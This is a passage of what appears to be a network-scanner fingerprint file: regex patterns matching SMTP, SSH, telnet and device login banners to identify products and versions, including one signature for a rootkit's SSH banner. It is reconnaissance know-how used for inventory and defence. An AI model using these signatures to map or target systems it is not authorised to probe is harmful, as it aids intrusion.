accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n +SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n +SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: 